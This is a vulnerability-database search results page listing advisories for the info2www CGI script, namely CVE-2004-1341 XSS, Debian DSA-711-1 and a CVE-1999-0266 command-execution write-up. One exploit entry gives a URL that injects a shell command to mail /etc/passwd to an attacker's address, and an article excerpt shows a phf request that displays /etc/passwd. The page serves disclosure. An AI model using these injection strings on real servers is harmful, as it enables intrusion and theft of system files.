22 matches found
EUVD-2004-1338
Malware in sbrugna...
SUSE CVE-2004-1341
Cross-site scripting XSS vulnerability in info2www before 1.2.2.9 allows remote attackers to inject arbitrary web script or HTML via the arguments to info2www...
Info2www 1.0/1.1 CGI Input Handling Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1995/info The info2www script allows HTTP access to information stored in GNU EMACS Info Nodes. This script fails to properly parse input and can be used to execute commands on the server with permissions of the web serve...
RoarSmithinfo2www远程执行任意命令漏洞
BugCVE: CVE-1999-0266 BUGTRAQ: 1995 “info2www”是一个将GNU Info文本转化成HTML文件的CGI程序。 某些早期版本的info2www脚本实现上存在输入验证漏洞,远程攻击者可以利用此漏洞以Web进程的权限在主机上 执行任意系统命令。 问题在于程序脚本没有过滤用户输入中包含的一些shell元字符,远程攻击者可能以Web守护程序的权限(root或nobody)在主机上执行任意程序。 1.0-1.1 临时解决方法: 如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:...
Debian Security Advisory DSA 711-1 (info2www)
The remote host is missing an update to info2www announced via advisory DSA 711-1. OpenVAS Vulnerability Test $Id: deb7111.nasl 6616 2017-07-07 12:10:49Z cfischer $ Description: Auto-generated from advisory DSA 711-1 Authors: Thomas Reinke Copyright: Copyright c 2007 E-Soft Inc...
Debian: Security Advisory (DSA-711-1)
The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2008 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
CGI vulnerability highlights-vulnerability warning-the black bar safety net
CGI vulnerability highlights For the following list of CGI vulnerabilities,simply speaking,you can directly delete the program or rewrite the program to reach the safety of the mesh The Below is not completely reprinted from the green Forumvia a Supplement A. phf vulnerability The phf vulnerabili...
RoarSmithinfo2www远程执行任意命令漏洞 Exploit
No description provided by source. Niall Smart ([email protected])提供了如下测试方法: 访问以下URL可以将系统的passwd文件发送到攻击者的邮箱。 http://target/cgi-bin/info2www?'../../../bin/mail your@email /etc/passwd|'...
Common 2 7 CGI vulnerability methods of attack-vulnerability warning-the black bar safety net
A. phf vulnerability The phf vulnerability seems to be the most classic,almost all of the articles will be introduced,you can execute Server commands,such as display the/etc/passwd: lynx http://www.victim.com/cgi-bin/phf?Q...t%20/etc/passwd But we can still find it? II. php. cgi 2. 0beta10 or...
[SECURITY] [DSA 711-1] New info2www packages fix cross-site scripting vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 711-1 [email protected] http://www.debian.org/security/ Martin Schulze April 19th, 2005 http://www.debian.org/security/faq -...
[SECURITY] [DSA 711-1] New info2www packages fix cross-site scripting vulnerability
-------------------------------------------------------------------------- Debian Security Advisory DSA 711-1 [email protected] http://www.debian.org/security/ Martin Schulze April 19th, 2005 http://www.debian.org/security/faq -...
[SECURITY] [DSA 711-1] New info2www packages fix cross-site scripting vulnerability
-------------------------------------------------------------------------- Debian Security Advisory DSA 711-1 [email protected] http://www.debian.org/security/ Martin Schulze April 19th, 2005 http://www.debian.org/security/faq -...
CVE-2004-1341
Cross-site scripting XSS vulnerability in info2www before 1.2.2.9 allows remote attackers to inject arbitrary web script or HTML via the arguments to info2www...
CVE-2004-1341
Cross-site scripting XSS vulnerability in info2www before 1.2.2.9 allows remote attackers to inject arbitrary web script or HTML via the arguments to info2www...
CVE-2004-1341
Cross-site scripting XSS vulnerability in info2www before 1.2.2.9 allows remote attackers to inject arbitrary web script or HTML via the arguments to info2www...
DEBIAN-CVE-2004-1341
Cross-site scripting XSS vulnerability in info2www before 1.2.2.9 allows remote attackers to inject arbitrary web script or HTML via the arguments to info2www...
CVE-2004-1341
CVE-2004-1341: XSS in info2www prior to 1.2.2.9. Debian DSA-711-1 fixes this remote vulnerability in info2www; affected versions for woody are resolved in 1.2.2.9-20woody1 and in sid with 1.2.2.9-23. OpenVAS/DSA entries confirm the fix. No details beyond the Debian advisory are provided here.
CVE-2004-1341
Cross-site scripting XSS vulnerability in info2www before 1.2.2.9 allows remote attackers to inject arbitrary web script or HTML via the arguments to info2www...
Debian DSA-711-1 : info2www - missing input sanitising
Nicolas Gregoire discovered a cross-site scripting vulnerability in info2www, a converter for info files to HTML. A malicious person could place a harmless looking link on the web that could cause arbitrary commands to be executed in the browser of the victim user. %NASLMINLEVEL 70300 C Tenable...
DSA-711-1 info2www - missing input sanitising
Bulletin has no description...